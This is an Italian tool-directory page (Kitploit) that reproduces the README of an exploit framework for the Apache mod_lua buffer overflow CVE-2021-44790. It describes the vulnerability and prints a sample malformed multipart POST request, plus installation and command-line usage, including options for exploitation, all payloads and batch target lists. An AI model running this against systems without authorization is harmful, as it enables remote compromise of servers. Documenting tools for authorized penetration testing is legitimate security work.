Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Framework di sfruttamento avanzato con fingerprinting, scansione multi-stage, architettura a plugin, reporting professionale, cattura di screenshot, database SQLite e rilevamento con confidenza superiore al 95%. Autore: Sudeepa Wanigarathna. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Scanner di Vulnerabilità WebFramework di ExploitExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Vedi Repository
1301 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Framework di sfruttamento avanzato con fingerprinting, scansione multi-stage, architettura a plugin, reporting professionale, cattura di screenshot, database SQLite e rilevamento con confidenza superiore al 95%. Autore: Sudeepa Wanigarathna.

Condividi

🔥 CVE-2021-44790 - Sfruttamento del Buffer Overflow di Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Panoramica

Apache mod_lua Buffer Overflow Exploitation è una piattaforma di sfruttamento avanzata, di livello enterprise, per CVE-2021-44790 - una vulnerabilità critica di buffer overflow nel modulo mod_lua di Apache HTTP Server 2.4.x. Questo framework offre funzionalità complete di fingerprinting, scoperta intelligente degli script, scansione multi-fase e reportistica professionale con rilevamento con affidabilità del 95%+.

⚡ Funzionalità principali

FunzionalitàDescrizione
🔍 Fingerprinting avanzatoRilevamento di versione Apache, mod_lua, OS, architettura, WAF, CDN, container, provider cloud
🎯 Scoperta intelligente7+ tecniche di scoperta tra cui robots.txt, sitemap, parsing HTML, estrazione JavaScript
💥 Scansione multi-faseConnessione → Fingerprint → Scoperta → Verifica → Sfruttamento → Report
🧩 Sistema di plugin estensibileSviluppo semplice di plugin per future CVE
🌐 Motore HTTP intelligentePool di connessioni, tentativi, supporto HTTP/2, rate limiting
📊 Reportistica completaJSON, HTML, Markdown, PDF con dashboard interattive
🎨 Splendida UI da terminaleLibreria Rich con barre di avanzamento, tabelle e output codificato a colori
💾 Database di ricercaArchiviazione SQLite con cronologia completa delle scansioni e supporto alle query
📸 Acquisizione screenshotScreenshot automatici delle pagine web per la raccolta di prove
🚀 Prestazioni elevate20+ thread concorrenti, 100+ pool di connessioni

🎯 Dettagli della vulnerabilità

AttributoValore
ID CVECVE-2021-44790
VulnerabilitàBuffer Overflow (Integer Underflow)
Software interessatoApache HTTP Server dalla 2.4.0 alla 2.4.51
Versione correttaApache HTTP Server 2.4.52 e successive
ComponenteModulo mod_lua
Vettore di attaccoRete (Remoto)
Punteggio CVSS9.8 (Critico)
Impatto sulla riservatezzaAlto
Impatto sull'integritàAlto
Impatto sulla disponibilitàAlto
Maturità dell'exploitProof-of-Concept disponibile

Descrizione tecnica

La vulnerabilità risiede nel modulo mod_lua durante l'elaborazione delle richieste multipart/form-data. Un integer underflow nella funzione lua_request_parsebody() può portare a un buffer overflow basato su heap, consentendo potenzialmente l'esecuzione remota di codice.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Screenshot

Interfaccia principaleRisultati del fingerprint
Avanzamento della scansioneDashboard del report HTML

🚀 Avvio rapido

Installazione

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Utilizzo di base

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Utilizzo dettagliato

Opzioni da riga di comando

python3 exploit.py [TARGET] [OPTIONS]
OpzioneDescrizioneEsempio
TARGETURL del targethttp://target.com
--config FILEFile di configurazione--config config.yaml
--threads NNumero di thread--threads 30
--timeout NTimeout delle richieste (secondi)--timeout 15
--proxy URLURL del proxy--proxy http://127.0.0.1:8080
--verboseOutput dettagliato--verbose
--scan-onlyScansione senza sfruttamento--scan-only
--exploitAbilita lo sfruttamento--exploit
--all-payloadsUsa tutti i payload--all-payloads
--report FORMATFormato del report (json/html/markdown/all)--report all
--output DIRDirectory di output--output /path/to/reports/
--researchAbilita la modalità ricerca--research
--database FILEPercorso del database--database luastorm.db
--screenshotAcquisisci screenshot--screenshot
--batch FILEFile batch con i target--batch targets.txt
--query SQLEsegui una query sul database--query "SELECT * FROM targets"

Esempi

1. Valutazione di base della vulnerabilità

python3 exploit.py https://example.com --verbose --report all

2. Scansione in ambiente aziendale

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Test di penetrazione completo

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Scansione batch

python3 exploit.py --batch targets.txt --config config.yaml

5. Query sul database

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Configurazione

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
Scarica lo strumento